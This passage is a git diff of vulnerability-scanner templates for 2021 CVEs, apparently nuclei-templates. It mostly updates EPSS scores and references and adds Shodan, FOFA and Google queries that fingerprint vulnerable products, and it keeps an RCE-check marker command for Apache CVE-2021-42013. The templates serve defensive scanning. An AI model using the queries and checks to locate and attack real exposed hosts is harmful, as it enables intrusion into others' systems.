CVE-2021-40542 cwe-id: CWE-79 - epss-score: 0.00643 - epss-percentile: 0.78811 + epss-score: 0.00342 + epss-percentile: 0.71484 cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: os4ed product: opensis shodan-query: http.title:"openSIS" + fofa-query: title="opensis" + google-query: intitle:"opensis" tags: cve2021,cve,xss,opensis,os4ed http: diff --git a/http/cves/2021/CVE-2021-40651.yaml b/http/cves/2021/CVE-2021-40651.yaml index 0cb298f8fb..7b03ac2e4c 100644 --- a/http/cves/2021/CVE-2021-40651.yaml +++ b/http/cves/2021/CVE-2021-40651.yaml @@ -11,17 +11,22 @@ info: - https://github.com/MiSERYYYYY/Vulnerability-Reports-and-Disclosures/blob/main/OpenSIS-Community-8.0.md - https://www.youtube.com/watch?v=wFwlbXANRCo - https://nvd.nist.gov/vuln/detail/CVE-2021-40651 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-40651 cwe-id: CWE-22 + epss-score: 0.02562 + epss-percentile: 0.90208 cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:* metadata: max-request: 2 - product: opensis vendor: os4ed + product: opensis shodan-query: "title:\"openSIS\"" + fofa-query: title="opensis" + google-query: intitle:"opensis" tags: cve,cve2021,lfi,os4ed,opensis,authenticated http: diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml index cb5258cfc8..140ba31264 100644 --- a/http/cves/2021/CVE-2021-40822.yaml +++ b/http/cves/2021/CVE-2021-40822.yaml @@ -30,6 +30,7 @@ info: product: geoserver shodan-query: title:"GeoServer" fofa-query: app="GeoServer" + google-query: intitle:"geoserver" tags: cve2021,cve,ssrf,geoserver,osgeo http: diff --git a/http/cves/2021/CVE-2021-40868.yaml b/http/cves/2021/CVE-2021-40868.yaml index 21c5ae0127..892fd6e7f5 100644 --- a/http/cves/2021/CVE-2021-40868.yaml +++ b/http/cves/2021/CVE-2021-40868.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-40868 cwe-id: CWE-79 - epss-score: 0.00379 - epss-percentile: 0.72411 + epss-score: 0.00464 + epss-percentile: 0.75425 cpe: cpe:2.3:a:cloudron:cloudron:6.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40870.yaml b/http/cves/2021/CVE-2021-40870.yaml index 1e3c7262f2..3882bb576c 100644 --- a/http/cves/2021/CVE-2021-40870.yaml +++ b/http/cves/2021/CVE-2021-40870.yaml @@ -20,15 +20,17 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40870 cwe-id: CWE-23 - epss-score: 0.85536 - epss-percentile: 0.98294 + epss-score: 0.91719 + epss-percentile: 0.98896 cpe: cpe:2.3:a:aviatrix:controller:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: aviatrix product: controller + shodan-query: http.title:"aviatrix cloud controller" + fofa-query: title="aviatrix cloud controller" + google-query: intitle:"aviatrix cloud controller" tags: cve2021,cve,intrusive,packetstorm,rce,aviatrix,kev,fileupload - variables: string: "CVE-2021-40870" diff --git a/http/cves/2021/CVE-2021-40875.yaml b/http/cves/2021/CVE-2021-40875.yaml index 7eefb59c54..00709d33e3 100644 --- a/http/cves/2021/CVE-2021-40875.yaml +++ b/http/cves/2021/CVE-2021-40875.yaml @@ -28,6 +28,7 @@ info: vendor: gurock product: testrail shodan-query: http.html:"TestRail" + fofa-query: body="testrail" tags: cve2021,cve,exposure,gurock,testrail http: diff --git a/http/cves/2021/CVE-2021-40908.yaml b/http/cves/2021/CVE-2021-40908.yaml index 9fdb9e476a..fea5baad9f 100644 --- a/http/cves/2021/CVE-2021-40908.yaml +++ b/http/cves/2021/CVE-2021-40908.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-40908 cwe-id: CWE-89 epss-score: 0.0161 - epss-percentile: 0.8612 + epss-percentile: 0.87425 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40968.yaml b/http/cves/2021/CVE-2021-40968.yaml index 6e545de39b..50a8575067 100644 --- a/http/cves/2021/CVE-2021-40968.yaml +++ b/http/cves/2021/CVE-2021-40968.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-40968 cwe-id: CWE-79 - epss-score: 0.00152 - epss-percentile: 0.50482 + epss-score: 0.00159 + epss-percentile: 0.5237 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -28,6 +28,8 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" + fofa-query: title="spotweb - overview" + google-query: intitle:"spotweb - overview" tags: cve2021,cve,xss,spotweb,spotweb_project http: diff --git a/http/cves/2021/CVE-2021-40969.yaml b/http/cves/2021/CVE-2021-40969.yaml index 3c7e768608..fa6db19a24 100644 --- a/http/cves/2021/CVE-2021-40969.yaml +++ b/http/cves/2021/CVE-2021-40969.yaml @@ -28,6 +28,8 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" + fofa-query: title="spotweb - overview" + google-query: intitle:"spotweb - overview" tags: cve2021,cve,xss,spotweb,spotweb_project http: diff --git a/http/cves/2021/CVE-2021-40970.yaml b/http/cves/2021/CVE-2021-40970.yaml index 43da6c18c3..9d92f16b48 100644 --- a/http/cves/2021/CVE-2021-40970.yaml +++ b/http/cves/2021/CVE-2021-40970.yaml @@ -28,6 +28,8 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" + fofa-query: title="spotweb - overview" + google-query: intitle:"spotweb - overview" tags: cve2021,cve,xss,spotweb,spotweb_project http: diff --git a/http/cves/2021/CVE-2021-40971.yaml b/http/cves/2021/CVE-2021-40971.yaml index 88dd6a8150..89c0bf68ef 100644 --- a/http/cves/2021/CVE-2021-40971.yaml +++ b/http/cves/2021/CVE-2021-40971.yaml @@ -28,6 +28,8 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" + fofa-query: title="spotweb - overview" + google-query: intitle:"spotweb - overview" tags: cve2021,cve,xss,spotweb,spotweb_project http: diff --git a/http/cves/2021/CVE-2021-40972.yaml b/http/cves/2021/CVE-2021-40972.yaml index 3221950a2a..bc2ed51d6b 100644 --- a/http/cves/2021/CVE-2021-40972.yaml +++ b/http/cves/2021/CVE-2021-40972.yaml @@ -28,6 +28,8 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" + fofa-query: title="spotweb - overview" + google-query: intitle:"spotweb - overview" tags: cve,cve2021,xss,spotweb,spotweb_project http: diff --git a/http/cves/2021/CVE-2021-40973.yaml b/http/cves/2021/CVE-2021-40973.yaml index 2ea1e563ed..3a356e0df3 100644 --- a/http/cves/2021/CVE-2021-40973.yaml +++ b/http/cves/2021/CVE-2021-40973.yaml @@ -28,6 +28,8 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" + fofa-query: title="spotweb - overview" + google-query: intitle:"spotweb - overview" tags: cve2021,cve,xss,spotweb,spotweb_project http: diff --git a/http/cves/2021/CVE-2021-40978.yaml b/http/cves/2021/CVE-2021-40978.yaml index e72fc123b2..4373d3e6c5 100644 --- a/http/cves/2021/CVE-2021-40978.yaml +++ b/http/cves/2021/CVE-2021-40978.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-40978 cwe-id: CWE-22 - epss-score: 0.03461 - epss-percentile: 0.90554 + epss-score: 0.04239 + epss-percentile: 0.92255 cpe: cpe:2.3:a:mkdocs:mkdocs:1.2.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41174.yaml b/http/cves/2021/CVE-2021-41174.yaml index 3e9a39243d..f54de54a16 100644 --- a/http/cves/2021/CVE-2021-41174.yaml +++ b/http/cves/2021/CVE-2021-41174.yaml @@ -19,14 +19,16 @@ info: cvss-score: 6.1 cve-id: CVE-2021-41174 cwe-id: CWE-79 - epss-score: 0.96194 - epss-percentile: 0.99478 + epss-score: 0.96363 + epss-percentile: 0.99558 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: grafana product: grafana shodan-query: title:"Grafana" + fofa-query: title="grafana" + google-query: intitle:"grafana" tags: cve2021,cve,grafana,xss http: diff --git a/http/cves/2021/CVE-2021-41192.yaml b/http/cves/2021/CVE-2021-41192.yaml index 665b12ebb6..892ac67cf2 100644 --- a/http/cves/2021/CVE-2021-41192.yaml +++ b/http/cves/2021/CVE-2021-41192.yaml @@ -14,19 +14,21 @@ info: - https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv - https://nvd.nist.gov/vuln/detail/CVE-2021-41192 - https://github.com/getredash/redash/commit/ce60d20c4e3d1537581f2f70f1308fe77ab6a214 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N cvss-score: 6.5 cve-id: CVE-2021-41192 cwe-id: CWE-1188 - epss-score: 0.00805 - epss-percentile: 0.79795 + epss-score: 0.00807 + epss-percentile: 0.81699 cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: redash product: redash shodan-query: http.favicon.hash:698624197 + fofa-query: icon_hash=698624197 tags: cve2021,cve,hackerone,redash,auth-bypass http: diff --git a/http/cves/2021/CVE-2021-41277.yaml b/http/cves/2021/CVE-2021-41277.yaml index 7729cab239..7ae351c658 100644 --- a/http/cves/2021/CVE-2021-41277.yaml +++ b/http/cves/2021/CVE-2021-41277.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41277 cwe-id: CWE-22,CWE-200 - epss-score: 0.95622 - epss-percentile: 0.99363 + epss-score: 0.95556 + epss-percentile: 0.99393 cpe: cpe:2.3:a:metabase:metabase:0.40.0:-:*:*:*:*:*:* metadata: max-request: 1 @@ -30,6 +30,7 @@ info: product: metabase shodan-query: http.title:"Metabase" fofa-query: app="Metabase" + google-query: intitle:"metabase" tags: cve2021,cve,metabase,lfi http: diff --git a/http/cves/2021/CVE-2021-41282.yaml b/http/cves/2021/CVE-2021-41282.yaml index 54567b4bd3..69b5afcdcd 100644 --- a/http/cves/2021/CVE-2021-41282.yaml +++ b/http/cves/2021/CVE-2021-41282.yaml @@ -28,6 +28,9 @@ info: max-request: 4 vendor: pfsense product: pfsense + google-query: intitle:"pfsense - login" + shodan-query: http.title:"pfsense - login" + fofa-query: title="pfsense - login" tags: cve2021,cve,pfsense,rce,authenticated http: diff --git a/http/cves/2021/CVE-2021-41291.yaml b/http/cves/2021/CVE-2021-41291.yaml index 3c29a1dada..62446f3bca 100644 --- a/http/cves/2021/CVE-2021-41291.yaml +++ b/http/cves/2021/CVE-2021-41291.yaml @@ -14,13 +14,14 @@ info: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php - https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html - https://www.twcert.org.tw/tw/cp-132-5127-3cbd3-1.html + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-41291 cwe-id: CWE-22 - epss-score: 0.03741 - epss-percentile: 0.90901 + epss-score: 0.02626 + epss-percentile: 0.90324 cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41293.yaml b/http/cves/2021/CVE-2021-41293.yaml index 9b96cd6fbc..26295accf6 100644 --- a/http/cves/2021/CVE-2021-41293.yaml +++ b/http/cves/2021/CVE-2021-41293.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41293 cwe-id: CWE-22 - epss-score: 0.05376 - epss-percentile: 0.92942 + epss-score: 0.02626 + epss-percentile: 0.90324 cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41349.yaml b/http/cves/2021/CVE-2021-41349.yaml index f62f548ae5..94a0c387f6 100644 --- a/http/cves/2021/CVE-2021-41349.yaml +++ b/http/cves/2021/CVE-2021-41349.yaml @@ -26,6 +26,9 @@ info: max-request: 1 vendor: microsoft product: exchange_server + shodan-query: vuln:cve-2021-26855 + fofa-query: title="outlook" + google-query: intitle:"outlook" tags: cve,cve2021,xss,microsoft,exchange http: diff --git a/http/cves/2021/CVE-2021-41432.yaml b/http/cves/2021/CVE-2021-41432.yaml index 4f48226efe..270f84d39a 100644 --- a/http/cves/2021/CVE-2021-41432.yaml +++ b/http/cves/2021/CVE-2021-41432.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-41432 cwe-id: CWE-79 epss-score: 0.00067 - epss-percentile: 0.27705 + epss-percentile: 0.29279 cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: flatpress product: flatpress shodan-query: http.html:"Flatpress" + fofa-query: body="flatpress" tags: cve2021,cve,flatpress,xss,authenticated,oss,intrusive http: diff --git a/http/cves/2021/CVE-2021-41467.yaml b/http/cves/2021/CVE-2021-41467.yaml index d08a056cb2..0c64e4d407 100644 --- a/http/cves/2021/CVE-2021-41467.yaml +++ b/http/cves/2021/CVE-2021-41467.yaml @@ -13,13 +13,15 @@ info: - https://github.com/hjue/JustWriting/issues/106 - https://nvd.nist.gov/vuln/detail/CVE-2021-41467 - https://github.com/hjue/JustWriting/ + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-41467 cwe-id: CWE-79 - epss-score: 0.00133 - epss-percentile: 0.48289 + epss-score: 0.00136 + epss-percentile: 0.48885 cpe: cpe:2.3:a:justwriting_project:justwriting:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41649.yaml b/http/cves/2021/CVE-2021-41649.yaml index 27865f7693..bcc7fd4486 100644 --- a/http/cves/2021/CVE-2021-41649.yaml +++ b/http/cves/2021/CVE-2021-41649.yaml @@ -13,13 +13,15 @@ info: - https://github.com/MobiusBinary/CVE-2021-41649 - https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system - https://nvd.nist.gov/vuln/detail/CVE-2021-41649 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/Offensive-Penetration-Security/OPSEC-Hall-of-fame classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-41649 cwe-id: CWE-89 - epss-score: 0.03607 - epss-percentile: 0.90729 + epss-score: 0.08507 + epss-percentile: 0.94431 cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41749.yaml b/http/cves/2021/CVE-2021-41749.yaml index e780e85cb8..6d03f016d1 100644 --- a/http/cves/2021/CVE-2021-41749.yaml +++ b/http/cves/2021/CVE-2021-41749.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-41749 cwe-id: CWE-94 - epss-score: 0.52531 - epss-percentile: 0.97293 + epss-score: 0.51305 + epss-percentile: 0.97555 cpe: cpe:2.3:a:nystudio107:seomatic:*:*:*:*:*:craft_cms:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-4191.yaml b/http/cves/2021/CVE-2021-4191.yaml index 599a58daa6..481c71c2ea 100644 --- a/http/cves/2021/CVE-2021-4191.yaml +++ b/http/cves/2021/CVE-2021-4191.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: gitlab product: gitlab + shodan-query: cpe:"cpe:2.3:a:gitlab:gitlab" + fofa-query: title="gitlab" + google-query: intitle:"gitlab" tags: cve2021,cve,gitlab,api,graphql,enum,unauth http: diff --git a/http/cves/2021/CVE-2021-41951.yaml b/http/cves/2021/CVE-2021-41951.yaml index 50fc4f78a2..da6933c6d4 100644 --- a/http/cves/2021/CVE-2021-41951.yaml +++ b/http/cves/2021/CVE-2021-41951.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-41951 cwe-id: CWE-79 - epss-score: 0.74322 - epss-percentile: 0.9805 + epss-score: 0.7541 + epss-percentile: 0.98159 cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-42013.yaml b/http/cves/2021/CVE-2021-42013.yaml index e366e89f18..fb6c1c2b29 100644 --- a/http/cves/2021/CVE-2021-42013.yaml +++ b/http/cves/2021/CVE-2021-42013.yaml @@ -28,6 +28,7 @@ info: max-request: 3 vendor: apache product: http_server + shodan-query: cpe:"cpe:2.3:a:apache:http_server" tags: cve2021,cve,lfi,apache,rce,misconfig,traversal,kev variables: cmd: "echo 31024-1202-EVC | rev" diff --git a/http/cves/2021/CVE-2021-42063.yaml b/http/cves/2021/CVE-2021-42063.yaml index 8a99b75474..7eee17aab2 100644 --- a/http/cves/2021/CVE-2021-42063.yaml +++ b/http/cves/2021/CVE-2021-42063.yaml @@ -30,6 +30,7 @@ info: product: knowledge_warehouse shodan-query: http.favicon.hash:-266008933 zoomeye-query: +app:"SAP NetWeaver Application Server httpd + fofa-query: icon_hash=-266008933 tags: cve2021,cve,sap,xss,seclists,packetstorm http: diff --git a/http/cves/2021/CVE-2021-42237.yaml b/http/cves/2021/CVE-2021-42237.yaml index b153f30f63..27f3f94f59 100644 --- a/http/cves/2021/CVE-2021-42237.yaml +++ b/http/cves/2021/CVE-2021-42237.yaml @@ -27,6 +27,8 @@ info: vendor: sitecore product: experience_platform shodan-query: http.title:"SiteCore" + fofa-query: title="sitecore" + google-query: intitle:"sitecore" tags: cve2021,cve,packetstorm,rce,sitecore,deserialization,oast,kev http: diff --git a/http/cves/2021/CVE-2021-42565.yaml b/http/cves/2021/CVE-2021-42565.yaml index 8857080df8..9c49827e34 100644 --- a/http/cves/2021/CVE-2021-42565.yaml +++ b/http/cves/2021/CVE-2021-42565.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-42565 cwe-id: CWE-79 - epss-score: 0.00102 - epss-percentile: 0.40517 + epss-score: 0.00106 + epss-percentile: 0.43259 cpe: cpe:2.3:a:myfactory:fms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-42566.yaml b/http/cves/2021/CVE-2021-42566.yaml index 554e72e8c1..4c53bc0282 100644 --- a/http/cves/2021/CVE-2021-42566.yaml +++ b/http/cves/2021/CVE-2021-42566.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-42566 cwe-id: CWE-79 - epss-score: 0.00102 - epss-percentile: 0.40517 + epss-score: 0.00106 + epss-percentile: 0.43259 cpe: cpe:2.3:a:myfactory:fms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-42567.yaml b/http/cves/2021/CVE-2021-42567.yaml index 15b73b825b..2741769864 100644 --- a/http/cves/2021/CVE-2021-42567.yaml +++ b/http/cves/2021/CVE-2021-42567.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2021-42567 cwe-id: CWE-79 epss-score: 0.25981 - epss-percentile: 0.96613 + epss-percentile: 0.96712 cpe: cpe:2.3:a:apereo:central_authentication_service:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apereo product: central_authentication_service shodan-query: http.title:'CAS - Central Authentication Service' + fofa-query: title='cas - central authentication service' + google-query: intitle:'cas - central authentication service' tags: cve2021,cve,apereo,xss,cas http: diff --git a/http/cves/2021/CVE-2021-42627.yaml b/http/cves/2021/CVE-2021-42627.yaml index 427b212260..c510465710 100644 --- a/http/cves/2021/CVE-2021-42627.yaml +++ b/http/cves/2021/CVE-2021-42627.yaml @@ -20,14 +20,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-42627 - epss-score: 0.16383 - epss-percentile: 0.95867 - cpe: cpe:2.3:o:dlink:dir-615_firmware:20.06:*:*:*:*:*:*:* + epss-score: 0.23452 + epss-percentile: 0.96557 + cpe: cpe:2.3:h:dlink:dir-615:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: dlink - product: dir-615_firmware + product: dir-615 shodan-query: http.title:"Roteador Wireless" tags: cve2021,cve,d-link,router,unauth,dir-615,roteador,dlink diff --git a/http/cves/2021/CVE-2021-42887.yaml b/http/cves/2021/CVE-2021-42887.yaml index 9f259c8513..f6d76339b5 100644 --- a/http/cves/2021/CVE-2021-42887.yaml +++ b/http/cves/2021/CVE-2021-42887.yaml @@ -20,13 +20,15 @@ info: cve-id: CVE-2021-42887 cwe-id: CWE-287 epss-score: 0.08034 - epss-percentile: 0.9414 + epss-percentile: 0.94287 cpe: cpe:2.3:o:totolink:ex1200t_firmware:4.1.2cu.5215:*:*:*:*:*:*:* metadata: max-request: 2 vendor: totolink product: ex1200t_firmware shodan-query: title:"TOTOLINK" + fofa-query: title="totolink" + google-query: intitle:"totolink" tags: cve2021,cve,totolink,auth-bypass,router http: diff --git a/http/cves/2021/CVE-2021-43062.yaml b/http/cves/2021/CVE-2021-43062.yaml index 9528b0ce66..99af1b861a 100644 --- a/http/cves/2021/CVE-2021-43062.yaml +++ b/http/cves/2021/CVE-2021-43062.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: fortinet product: fortimail + fofa-query: title="fortimail" + shodan-query: http.title:"fortimail" + google-query: intitle:"fortimail" tags: cve,cve2021,fortimail,xss,fortinet,edb http: diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml index 57168e57b4..3e38714fe2 100644 --- a/http/cves/2021/CVE-2021-43287.yaml +++ b/http/cves/2021/CVE-2021-43287.yaml @@ -27,6 +27,8 @@ info: vendor: thoughtworks product: gocd shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" + fofa-query: title="create a pipeline - go" html:"gocd version" + google-query: intitle:"create a pipeline - go" html:"gocd version" tags: cve2021,cve,go,lfi,gocd,thoughtworks http: diff --git a/http/cves/2021/CVE-2021-43421.yaml b/http/cves/2021/CVE-2021-43421.yaml index b25b9eeda6..bd276d57db 100644 --- a/http/cves/2021/CVE-2021-43421.yaml +++ b/http/cves/2021/CVE-2021-43421.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-43421 cwe-id: CWE-434 - epss-score: 0.06629 - epss-percentile: 0.93651 + epss-score: 0.05253 + epss-percentile: 0.93023 cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-43496.yaml b/http/cves/2021/CVE-2021-43496.yaml index 0b03ad31a3..0ecff67cdb 100644 --- a/http/cves/2021/CVE-2021-43496.yaml +++ b/http/cves/2021/CVE-2021-43496.yaml @@ -12,13 +12,16 @@ info: reference: - https://github.com/varun-suresh/Clustering/issues/12 - https://nvd.nist.gov/vuln/detail/CVE-2021-43496 + - https://github.com/StarCrossPortal/scalpel + - https://github.com/anonymous364872/Rapier_Tool + - https://github.com/apif-review/APIF_tool_2024 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-43496 cwe-id: CWE-22 - epss-score: 0.03503 - epss-percentile: 0.90603 + epss-score: 0.02502 + epss-percentile: 0.90106 cpe: cpe:2.3:a:clustering_project:clustering:2019-07-26:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-43510.yaml b/http/cves/2021/CVE-2021-43510.yaml index f0eeb1df1e..1ddd5fcb17 100644 --- a/http/cves/2021/CVE-2021-43510.yaml +++ b/http/cves/2021/CVE-2021-43510.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-43510 cwe-id: CWE-89 epss-score: 0.03977 - epss-percentile: 0.9183 + epss-percentile: 0.92014 cpe: cpe:2.3:a:simple_client_management_system_project:simple_client_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-43574.yaml b/http/cves/2021/CVE-2021-43574.yaml index 0cb6385c90..fa5d8ee81e 100644 --- a/http/cves/2021/CVE-2021-43574.yaml +++ b/http/cves/2021/CVE-2021-43574.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-43574 cwe-id: CWE-79 epss-score: 0.00132 - epss-percentile: 0.47351 + epss-percentile: 0.48231 cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: atmail product: atmail shodan-query: http.html:"Powered by Atmail" + fofa-query: body="powered by atmail" tags: cve2021,cve,atmail,xss http: diff --git a/http/cves/2021/CVE-2021-43725.yaml b/http/cves/2021/CVE-2021-43725.yaml index 328d5008cb..b28dd57297 100644 --- a/http/cves/2021/CVE-2021-43725.yaml +++ b/http/cves/2021/CVE-2021-43725.yaml @@ -28,6 +28,8 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" + fofa-query: title="spotweb - overview" + google-query: intitle:"spotweb - overview" tags: cve,cve2021,xss,spotweb,unauth,spotweb_project http: diff --git a/http/cves/2021/CVE-2021-43734.yaml b/http/cves/2021/CVE-2021-43734.yaml index cbd7d46ca1..1ecbf05be4 100644 --- a/http/cves/2021/CVE-2021-43734.yaml +++ b/http/cves/2021/CVE-2021-43734.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-43734 cwe-id: CWE-22 - epss-score: 0.01491 - epss-percentile: 0.85503 + epss-score: 0.00856 + epss-percentile: 0.82223 cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: keking product: kkfileview shodan-query: http.html:"kkFileView" + fofa-query: body="kkfileview" tags: cve2021,cve,kkfileview,traversal,lfi,keking http: diff --git a/http/cves/2021/CVE-2021-43778.yaml b/http/cves/2021/CVE-2021-43778.yaml index f63e0ce1c9..b3a453604c 100644 --- a/http/cves/2021/CVE-2021-43778.yaml +++ b/http/cves/2021/CVE-2021-43778.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-43778 cwe-id: CWE-22 - epss-score: 0.53541 - epss-percentile: 0.97558 + epss-score: 0.59414 + epss-percentile: 0.97756 cpe: cpe:2.3:a:glpi-project:barcode:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-43798.yaml b/http/cves/2021/CVE-2021-43798.yaml index 7e0ba71aa8..225c8a64e7 100644 --- a/http/cves/2021/CVE-2021-43798.yaml +++ b/http/cves/2021/CVE-2021-43798.yaml @@ -28,6 +28,8 @@ info: vendor: grafana product: grafana shodan-query: title:"Grafana" + fofa-query: title="grafana" + google-query: intitle:"grafana" tags: cve2021,cve,packetstorm,grafana,lfi http: diff --git a/http/cves/2021/CVE-2021-43810.yaml b/http/cves/2021/CVE-2021-43810.yaml index 8b70a29e0c..b191ba1008 100644 --- a/http/cves/2021/CVE-2021-43810.yaml +++ b/http/cves/2021/CVE-2021-43810.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-43810 cwe-id: CWE-79 - epss-score: 0.00369 - epss-percentile: 0.72044 + epss-score: 0.00396 + epss-percentile: 0.73393 cpe: cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44077.yaml b/http/cves/2021/CVE-2021-44077.yaml index 7353160d48..0c62873beb 100644 --- a/http/cves/2021/CVE-2021-44077.yaml +++ b/http/cves/2021/CVE-2021-44077.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: zohocorp product: manageengine_servicedesk_plus + shodan-query: http.title:"manageengine servicedesk plus" + fofa-query: title="manageengine servicedesk plus" + google-query: intitle:"manageengine servicedesk plus" tags: cve2021,cve,rce,kev,msf,zoho,manageengine,zohocorp http: diff --git a/http/cves/2021/CVE-2021-44138.yaml b/http/cves/2021/CVE-2021-44138.yaml index 7b9c396b20..40f7fdc4c0 100644 --- a/http/cves/2021/CVE-2021-44138.yaml +++ b/http/cves/2021/CVE-2021-44138.yaml @@ -27,6 +27,7 @@ info: vendor: caucho product: resin shodan-query: html:"Resin" + fofa-query: body="resin" tags: cve2021,cve,resin,caucho,lfi http: diff --git a/http/cves/2021/CVE-2021-44139.yaml b/http/cves/2021/CVE-2021-44139.yaml index 99c8f046f5..0447b37050 100644 --- a/http/cves/2021/CVE-2021-44139.yaml +++ b/http/cves/2021/CVE-2021-44139.yaml @@ -25,6 +25,8 @@ info: vendor: hashicorp product: sentinel shodan-query: title:"Sentinel Dashboard" + fofa-query: title="sentinel dashboard" + google-query: intitle:"sentinel dashboard" tags: cve2021,cve,ssrf,alibaba,oast,misconfig,sentinel,hashicorp http: diff --git 